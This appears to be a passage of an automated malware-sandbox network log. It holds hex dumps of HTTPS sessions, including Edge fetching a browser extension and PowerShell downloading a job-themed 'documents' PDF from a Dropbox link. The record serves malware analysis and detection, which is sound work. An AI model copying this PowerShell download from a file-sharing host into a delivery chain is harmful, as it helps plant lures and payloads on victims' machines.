                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: ab 0f a1 78 82 14 fe 55 a7 00 28 48 ad fa 6a 11 3e 6c 02 65 bc 80 56 47 b2 98 5b a6 de 16 e0 42 e4 0c 1a 42 d3 f1 fb 5b e3 10 1e fd f7 a0 b5 40 e1 c3 cc 3e d2 e3 10 2d 8d e1 c3 78 5e b2 26 8c 04 3d a1 96 4f 67 d3 b5 88 eb a0 65 35 82 b9 3f 8d a7 7f be 05 38 26 19 de 44 2b b2 e4 90 fa 2c 4f 98 67 24 42 63 22 50 da a3 3f 68 07 bb 76 05 a0 cc 75 cd d6 92 27 c6 fe 8b e0 96 f9 f4 4b 88 d6 44 72 97 37 34 86 00 d1 f0 5b b9 e3 0b 05 90 9d ba 15 69 cd 7d 81 3e f2 ff ae 18 57 98 1b f4 d1 8f 20 98 af 12 5e e4 dd 06 2d 3c fb cb d0 97 4b 02 66 45 38 b7 73 02 8d 35 8c ff 10 f2 8f ce dd 32 c6 0a 3f ec 00 85 08 8c 6a 33 61 d2 ff 2a 0a 0d ac 80 ae 75 70 02 ca 3e 0e b6 df f8 6f de c0 9b a7 e6 e5 ae 9e 7c 2d 44 eb 2f 95 a1 c4 66 19 88 d6 98 70 5a 7d 20 e0 01 f6 da ca b4 2b
                                                                                                                                                                                                                                                                  Data Ascii: xU(Hj>leVG[BB[@>-x^&=Oge5?8&D+,Og$Bc"P?hvu'KDr74[i}>W ^-<KfE8s52?j3a*up>o|-D/fpZ} +
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: f0 3f f9 ee cc 4b 2c 7b 78 52 3f aa 7e 32 9b 1f 3f 7e b9 b8 cc 71 d2 07 81 1a 79 9d 08 14 90 36 68 ce 8c 18 e0 f4 a0 4c 10 1c d0 e0 c0 b5 64 26 a0 1f b1 0f cf cb fc d6 73 e0 6a 4b b0 75 73 f2 53 da 2c 0b 59 8e d8 47 ac 1d d2 93 67 a2 77 59 cc 5a 4c 06 46 3f 27 af 84 56 ee 6c 86 2e 1f d7 2a f1 61 22 64 81 97 a3 a1 9a 40 c1 1b cc 1e f3 6b 3e 2a a5 6a 39 0b 39 cc 76 85 0d dd 90 b1 57 50 22 cf 1c 6f 22 9b 5d 84 35 b4 ce bf 2d 88 7d 23 6b fd 0d f8 51 44 88 17 eb 5d ed 3c fd 62 45 c9 f0 b0 d1 86 0f ec 68 c5 43 1a 7c bb 7b 83 b7 a8 41 9d 40 1d 33 41 b7 7e 74 a2 79 d6 92 91 86 da 82 68 b3 07 3e 90 ea 3d 82 53 21 90 b4 8c 89 0c 08 98 0f b8 73 5a 26 bb c9 c6 94 60 b6 8d e2 1c 7e 48 68 27 6f b1 97 97 42 20 5a 78 d1 c4 6c 32 10 02 2b 0b b6 86 21 da d2 15 47 b4 ea 02
                                                                                                                                                                                                                                                                  Data Ascii: ?K,{xR?~2?~qy6hLd&sjKusS,YGgwYZLF?'Vl.*a"d@k>*j99vWP"o"]5-}#kQD]<bEhC|{A@3A~tyh>=S!sZ&`~Hh'oB Zxl2+!G
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC300INData Raw: b1 02 63 c9 12 c2 04 e3 c5 90 b3 06 51 cf d6 69 1d 61 aa 87 ca 72 d7 c1 5c 0c 1b f3 b9 49 f7 1e 3d 21 f1 ee 39 60 2b 6b da 4b 39 92 1d ee 51 d5 8c 7d 56 4c 20 c1 eb f5 d7 db 69 fe 5f ca c4 d3 59 4b 4d 4e 49 27 8b aa e9 0e b6 ed 01 f3 15 c3 cb e7 77 47 27 e6 14 57 97 67 0b db 8e ce f0 4d 59 e8 3d 07 e5 e8 1c 5a 2f 4e 52 99 2c d5 d2 9e bb f0 e5 6a f1 32 8b a3 64 08 94 ff 26 cf b0 68 2e 01 ac b1 64 55 51 0a 43 59 16 be 10 87 38 9a d9 b2 27 42 f9 ee bd 55 43 5f 6d 58 e7 6b 37 83 d7 1d 36 72 76 fd e4 c4 f9 36 66 e0 62 7e c1 b0 8d 52 26 cc 79 3f 97 e4 c5 55 35 1d c9 b5 a7 97 90 ed f5 b2 7b 5c 0b 71 16 d4 2b 25 ef a3 7b eb 26 e3 39 e3 42 7e 8e c7 ed ee 7d bf 36 e9 1c aa 03 95 3b 2d eb 91 cc dd 52 c3 33 3e 30 25 df b0 0c 4b 25 b2 f6 4f ff f5 ac 0a b7 44 79 63 e5
                                                                                                                                                                                                                                                                  Data Ascii: cQiar\I=!9`+kK9Q}VL i_YKMNI'wG'WgMY=Z/NR,j2d&h.dUQCY8'BUC_mXk76rv6fb~R&y?U5{\q+%{&9B~}6;-R3>0%K%ODyc
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: 8f d8 13 a1 12 95 e0 57 32 b8 17 bc 75 cf 82 5b 28 42 fa 52 c5 ac 5b 23 4d d8 cb 31 ce ca 49 a8 f1 ea b5 5b 9e c6 26 72 df 67 e7 5d d6 df 8e de d1 9f b0 a8 4f 2c 9b 1f a2 37 bf e2 64 a3 73 61 47 7d a2 1e 1a 48 dc 22 34 9b cf 45 5e 24 d9 84 e3 ef b5 eb c3 e6 02 af 9a 7b 07 cf 31 5d 6c 4d 20 dc fb c6 87 d6 6b 5a 68 f6 2f cf fb fa 2b fa be a4 23 6f b4 b6 cd a7 7d fb 15 58 bf cb f5 e5 dc 33 3d f1 e4 db 6f e8 d7 5f ee bb 2a 8a c1 ab d1 3a cf 59 ce ff ac 2e ae f7 b4 ce 73 5b f5 3a 30 f2 9c d3 cf 35 fe 1c 57 13 34 4c 15 c3 68 2b 6e e1 6f e1 56 17 0f 86 c4 68 c5 a1 51 9e fb 4d e5 35 ad f8 15 2f 0e 96 92 65 92 eb 8d b2 ec 47 9b 8e 35 84 25 4d 4c 53 52 99 2c 08 d8 e0 31 72 f6 6c a1 75 5e a1 ff ab 87 69 a1 ce 5f eb 35 f7 a4 fc 50 d7 0d fe 86 77 aa 7a 36 f5 51 77 79
                                                                                                                                                                                                                                                                  Data Ascii: W2u[(BR[#M1I[&rg]O,7dsaG}H"4E^${1]lM kZh/+#o}X3=o_*:Y.s[:05W4Lh+noVhQM5/eG5%MLSR,1rlu^i_5Pwz6Qwy
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: ea 78 00 e3 ab 11 42 b5 cc 67 c8 03 e0 d9 c1 8d 6e 9a c0 18 a7 1e 40 2c 98 58 94 15 21 98 5c 84 61 16 4c 5a 01 4e 60 7c db 38 27 09 a4 41 d4 97 07 40 c7 32 ec 30 80 87 93 31 c8 77 81 f5 ae b3 89 ac 46 52 1d 04 0f 50 86 1e 0c 4e ff b6 55 61 45 e4 ca c1 89 80 67 54 8d a0 6b 7b 81 21 6c cf c8 42 82 5e bd 53 93 85 dc 0b 62 da 91 1d 52 8c 7c 7c 40 1e c4 4d 51 8b bd 59 11 22 33 aa a4 15 32 19 f3 4a bd 70 76 23 f5 5a a7 84 74 69 aa 50 44 07 b4 76 e7 a6 09 aa 12 af 67 ed 9a b6 64 34 f9 9d 39 94 04 33 ea 4a 60 2e b1 91 e5 8c 8a fb 20 7e 78 51 8a 03 8a 29 18 8b 5a e1 24 95 7a e3 de 94 97 96 82 df ee 5a 37 3a 6e 8d ae 1b f5 5f 77 ee cd 66 dc e2 56 7a 5c 37 db 30 e0 56 b6 b9 56 80 36 b4 31 60 ea 86 a8 a0 50 af e2 85 19 41 ce 32 da a7 53 95 7c 52 c9 97 03 2a eb 68 a0
                                                                                                                                                                                                                                                                  Data Ascii: xBgn@,X!\aLZN`|8'A@201wFRPNUaEgTk{!lB^SbR||@MQY"32Jpv#ZtiPDvgd493J`. ~xQ)Z$zZ7:n_wfVz\70VV61`PA2S|R*h


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  13192.168.2.649777142.250.181.654437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                  Expires: Thu, 18 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Age: 74776
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  14192.168.2.649783162.125.69.184438924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC288OUTGET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: media-src https://* blob: ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/ [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com/cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MTQ0MTg5NjU4NTYyNTczNTkyMTI0Njk1MDg5NDkwMDk0OTM0OTk2; Path=/; Expires=Tue, 18 Dec 2029 12:44:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=jZCWk450Fc3vHJEOEUMA6ycd; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=jZCWk450Fc3vHJEOEUMA6ycd; Path=/; Expires=Fri, 19 Dec 2025 12:44:31 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=tPhhoZo8is; Path=/; Expires=Fri, 19 Dec 2025 12:44:31 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:31 GMT
